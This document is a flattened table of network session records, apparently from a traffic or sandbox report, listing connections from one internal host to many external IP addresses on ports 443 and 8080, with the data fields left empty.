                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17459192.168.2.2340724157.5.91.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17460192.168.2.233854863.168.114.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17461192.168.2.236063099.162.78.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17462192.168.2.234016640.132.151.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17463192.168.2.2356844204.191.205.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17464192.168.2.2343784105.92.236.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17465192.168.2.235098496.131.47.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17466192.168.2.2359634135.203.52.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17467192.168.2.2339758145.40.66.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17468192.168.2.2351204174.135.78.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17469192.168.2.233400292.226.79.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17470192.168.2.2351972139.236.66.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17471192.168.2.2345620166.179.206.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17472192.168.2.2356910216.97.21.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17473192.168.2.233741039.122.222.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17474192.168.2.2351860111.186.237.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17475192.168.2.234440219.61.191.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17476192.168.2.2348990168.124.153.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17477192.168.2.234371096.131.215.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17478192.168.2.234422659.228.26.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17479192.168.2.2351160168.181.253.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17480192.168.2.236006272.239.205.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17481192.168.2.233921245.167.169.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17482192.168.2.2351614129.243.184.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17483192.168.2.235670434.179.71.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17484192.168.2.2352814154.40.6.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17485192.168.2.2338698158.213.198.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17486192.168.2.235923694.64.45.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17487192.168.2.234656277.252.72.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17488192.168.2.2346430157.95.124.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17489192.168.2.2355008173.177.115.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17490192.168.2.2358514130.184.191.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17491192.168.2.2339236181.219.174.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17492192.168.2.2336586181.232.43.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17493192.168.2.2335194164.96.82.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17494192.168.2.2360684113.62.200.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17495192.168.2.235954834.141.74.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17496192.168.2.2341960197.205.195.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17497192.168.2.233472060.231.2.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17498192.168.2.2350140170.24.82.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17499192.168.2.2339410191.136.145.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17500192.168.2.235508269.58.147.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17501192.168.2.234160890.73.82.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17502192.168.2.234476279.73.39.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17503192.168.2.2347016150.182.37.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17504192.168.2.235799498.31.30.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17505192.168.2.234332218.72.29.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17506192.168.2.235947284.214.247.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17507192.168.2.2355646146.95.9.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17508192.168.2.234298432.191.189.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17509192.168.2.233773695.141.193.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17510192.168.2.235821479.47.114.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17511192.168.2.2349842165.168.27.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17512192.168.2.233559697.148.42.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17513192.168.2.233419440.63.215.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17514192.168.2.235772291.90.186.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17515192.168.2.234264241.192.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17516192.168.2.2337236209.174.189.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17517192.168.2.2353630145.8.247.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17518192.168.2.233312859.218.78.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17519192.168.2.2334184209.203.231.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17520192.168.2.235840442.104.178.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17521192.168.2.2341804143.81.22.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17522192.168.2.2347158220.45.130.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17523192.168.2.2360986180.1.255.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17524192.168.2.235060691.129.97.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17525192.168.2.235769643.123.44.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17526192.168.2.234626453.248.175.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17527192.168.2.2352890181.17.174.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17528192.168.2.2340486182.158.19.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17529192.168.2.2353362159.34.248.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17530192.168.2.234174652.167.184.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17531192.168.2.235593462.153.143.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17532192.168.2.2358466221.101.164.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17533192.168.2.233449014.2.9.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17534192.168.2.2345566117.128.148.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17535192.168.2.2337028213.34.106.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17536192.168.2.235523258.184.217.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17537192.168.2.2355960176.89.59.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17538192.168.2.2334744111.132.164.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17539192.168.2.2335422162.3.55.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17540192.168.2.2338152204.178.201.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17541192.168.2.234270663.0.244.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17542192.168.2.2338620121.167.199.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17543192.168.2.234180071.236.245.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17544192.168.2.2346928135.228.22.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17545192.168.2.2352982156.0.148.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17546192.168.2.2359004112.1.106.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17547192.168.2.235967648.7.94.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17548192.168.2.235565885.19.179.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17549192.168.2.2350644189.216.13.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17550192.168.2.2333848206.209.57.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17551192.168.2.2356436176.200.253.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17552192.168.2.2351610114.199.164.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17553192.168.2.2356824158.105.136.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17554192.168.2.235749887.193.37.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17555192.168.2.2338834110.168.212.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17556192.168.2.2336006218.79.148.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17557192.168.2.234336272.27.36.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17558192.168.2.2360724113.55.220.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17559192.168.2.235401671.63.186.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17560192.168.2.234591295.24.77.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17561192.168.2.234173480.76.98.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17562192.168.2.2353168156.214.123.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17563192.168.2.23528004.247.195.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17564192.168.2.23445264.18.179.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17565192.168.2.2340954213.243.226.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17566192.168.2.2357936133.0.158.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17567192.168.2.2358512162.65.35.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17568192.168.2.2354668107.58.138.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17569192.168.2.23469909.1.197.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17570192.168.2.235174813.194.137.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17571192.168.2.23349585.123.191.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17572192.168.2.2334992168.3.46.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17573192.168.2.234823245.1.203.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17574192.168.2.235195013.7.0.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17575192.168.2.233358275.65.213.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17576192.168.2.2359762207.64.159.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17577192.168.2.2334808195.109.104.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17578192.168.2.2342232167.37.14.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17579192.168.2.2341572176.112.115.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17580192.168.2.2335750186.66.212.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17581192.168.2.2344338139.166.241.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17582192.168.2.2350904122.210.197.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17583192.168.2.234316071.144.47.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17584192.168.2.2333956160.67.168.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17585192.168.2.233734054.56.136.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17586192.168.2.233368075.156.171.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17587192.168.2.234900261.20.190.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17588192.168.2.2355724108.246.123.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17589192.168.2.2357394116.147.32.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17590192.168.2.2360260217.14.23.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17591192.168.2.2337292211.173.136.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17592192.168.2.2359026167.124.154.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17593192.168.2.2357894102.179.64.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17594192.168.2.235533251.40.147.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17595192.168.2.2360724156.212.12.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17596192.168.2.2336754178.52.138.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17597192.168.2.2347868201.138.136.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17598192.168.2.23355845.66.204.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17599192.168.2.2352648137.200.237.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17600192.168.2.233612059.168.99.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17601192.168.2.2356950210.58.208.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17602192.168.2.2360518139.0.218.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17603192.168.2.234124043.168.155.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17604192.168.2.233489854.116.130.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17605192.168.2.2336164180.92.206.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17606192.168.2.23464588.245.88.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17607192.168.2.2354510217.42.101.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17608192.168.2.2355880209.25.239.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17609192.168.2.2336900170.197.72.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17610192.168.2.233781247.28.129.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17611192.168.2.2348522120.112.49.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17612192.168.2.233541488.26.254.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17613192.168.2.234362870.250.157.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17614192.168.2.2346386212.185.180.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17615192.168.2.2352826191.171.115.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17616192.168.2.233950462.49.152.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17617192.168.2.234264668.68.136.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17618192.168.2.2357870212.200.14.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17619192.168.2.234478093.90.213.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17620192.168.2.2349932203.22.6.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17621192.168.2.235845040.233.13.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17622192.168.2.235266035.37.26.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17623192.168.2.234337875.76.235.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17624192.168.2.233878037.125.131.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17625192.168.2.234644018.54.249.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17626192.168.2.235578038.76.192.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17627192.168.2.2355550179.98.92.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17628192.168.2.233794235.106.159.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17629192.168.2.234072853.65.12.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17630192.168.2.233489094.156.100.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17631192.168.2.2345292185.176.60.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17632192.168.2.2340520117.239.239.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17633192.168.2.234683414.66.217.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17634192.168.2.235745440.127.225.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17635192.168.2.2347114103.250.144.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17636192.168.2.2337690106.80.210.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17637192.168.2.2339688141.1.206.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17638192.168.2.2344222141.171.88.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17639192.168.2.2350770141.169.130.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17640192.168.2.2355184175.43.152.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17641192.168.2.233735671.178.189.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17642192.168.2.235365027.150.224.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17643192.168.2.2349928212.212.120.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17644192.168.2.2340640151.70.61.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17645192.168.2.234908657.37.236.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17646192.168.2.2335894194.126.36.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17647192.168.2.2351894211.255.104.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17648192.168.2.234906294.113.43.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17649192.168.2.235887443.60.90.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17650192.168.2.235409831.64.190.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17651192.168.2.23514604.107.175.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17652192.168.2.233797262.213.151.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17653192.168.2.2332800164.27.81.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17654192.168.2.2335366103.120.62.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17655192.168.2.2353564210.71.27.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17656192.168.2.236060650.154.207.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17657192.168.2.2352562212.125.8.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17658192.168.2.2353794186.111.184.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17659192.168.2.2346408163.223.12.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17660192.168.2.2343254116.17.48.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17661192.168.2.233885868.252.11.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17662192.168.2.234798665.244.131.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17663192.168.2.2351286180.131.214.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17664192.168.2.2349354181.24.192.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17665192.168.2.233753838.143.90.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17666192.168.2.233945440.169.12.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17667192.168.2.2346096117.114.13.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17668192.168.2.2352176100.154.185.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17669192.168.2.233823867.225.202.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17670192.168.2.233673485.79.159.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17671192.168.2.2335992172.64.107.2188080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17672192.168.2.234145245.223.245.918080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17673192.168.2.235274034.201.120.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17674192.168.2.2355042122.63.255.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17675192.168.2.234756237.22.179.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17676192.168.2.236024253.42.228.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17677192.168.2.2334844200.138.201.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17678192.168.2.2335716149.52.35.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17679192.168.2.2336122187.206.55.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17680192.168.2.2355666194.195.178.228443
                                            TimestampBytes transferredDirectionData


